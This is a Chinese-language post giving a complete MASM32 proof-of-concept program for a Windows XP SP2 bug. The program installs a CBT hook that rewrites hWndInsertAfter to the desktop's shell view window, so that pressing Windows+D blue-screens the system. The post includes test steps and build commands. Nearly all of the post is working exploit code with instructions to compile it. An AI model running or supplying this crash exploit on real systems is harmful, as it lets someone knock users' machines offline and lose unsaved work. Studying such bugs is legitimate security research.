应用程序通过hook 函数CBTProc并判断当nCode值为HCBT_CREATEWND时,hook函数就可以使hWndInsertAfter成为其它窗口的hwnd 。当用户按下WindowsKey+D最小化所有窗口时即可触发这个函数。
测试环境:
操作系统:WIN XP SP2
测试过程:
1、运行测试程序
2、按下WindowsKey+D
3、系统蓝屏
程序代码:
- .386
- .model flat,stdcall
- option casemap:none
-
- include windows.inc
- include user32.inc
- include kernel32.inc
- includelib user32.lib
- includelib kernel32.lib
-
- .const
- .data
- _wnd db "hcbtExploit",0
- .data?
- hhook dd ?
- .code
-
- WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
- .if uMsg==WM_DESTROY
- invoke PostQuitMessage,0
- xor eax,eax
- .else
- invoke DefWindowProc,hWnd,uMsg,wParam,lParam
- .endif
- ret
- WndProc endp
-
- HookProc proc uses ebx nCode:UINT,wParam:WPARAM,lParam:LPARAM
- local buf[MAX_PATH]:BYTE
- .if nCode==HCBT_CREATEWND
- invoke GetClassName,wParam,addr buf,MAX_PATH
- invoke lstrcmpi,addr buf,offset _wnd
- .if eax==0
- mov ebx,lParam
- assume ebx:PTR CBT_CREATEWND
- invoke GetDesktopWindow
- invoke GetWindow,eax,GW_CHILD
- invoke GetWindow,eax,GW_HWNDLAST ; (Progman)
- invoke GetWindow,eax,GW_CHILD ; (SHELLDLL_DefView)
- mov [ebx].hWndInsertAfter,eax
- assume ebx:nothing
- .endif
- xor eax,eax
- .else
- invoke CallNextHookEx,hhook,nCode,wParam,lParam
- .endif
- ret
- HookProc endp
-
- WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
- local wc:WNDCLASSEX
- local msg:MSG
- local hwnd:HWND
- mov wc.cbSize,sizeof wc
- mov wc.style,CS_VREDRAW
- mov wc.lpfnWndProc,offset WndProc
- mov wc.cbClsExtra,0
- mov wc.cbWndExtra,0
- mov eax,hInst
- mov wc.hInstance,eax
- mov wc.hbrBackground,COLOR_WINDOW
- mov wc.lpszMenuName,0
- mov wc.lpszClassName,offset _wnd
- invoke LoadIcon,0,IDI_WARNING
- mov wc.hIcon,eax
- mov wc.hIconSm,eax
- invoke LoadCursor,0,IDC_CROSS
- mov wc.hCursor,eax
- invoke RegisterClassEx,addr wc
-
- invoke GetCurrentThreadId
- invoke SetWindowsHookEx,WH_CBT,offset HookProc,0,eax
- mov hhook,eax
-
- invoke CreateWindowEx,\
- 0,\
- offset _wnd,offset _wnd,\
- WS_OVERLAPPEDWINDOW,\
- 400,250,600,400,0,0,hInst,0
- mov hwnd,eax
-
- invoke UnhookWindowsHookEx,hhook
-
- invoke ShowWindow,hwnd,CmdShow
- invoke UpdateWindow,hwnd
-
- .while TRUE
- invoke GetMessage,addr msg,0,0,0
- .break .if (!eax)
- invoke TranslateMessage,addr msg
- invoke DispatchMessage,addr msg
- .endw
- mov eax,msg.wParam
- ret
- WinMain endp
-
- start:
- invoke GetModuleHandle,0
- invoke WinMain,eax,0,0,SW_SHOWNORMAL
- invoke ExitProcess,eax
- end start
编译说明:
测试代码用Win32汇编编写,使用MASM32编译即可,Win32汇编环境搭建我之前已有介绍,将环境搭建好后进入到程序目录下,使用ml /c /coff hcbtExploit.asm命令编译,然后进行连接link /subsystem:windows hcbtExploit.obj,即可生成测试程序hcbtExploit.exe!
推荐
评论(0条)
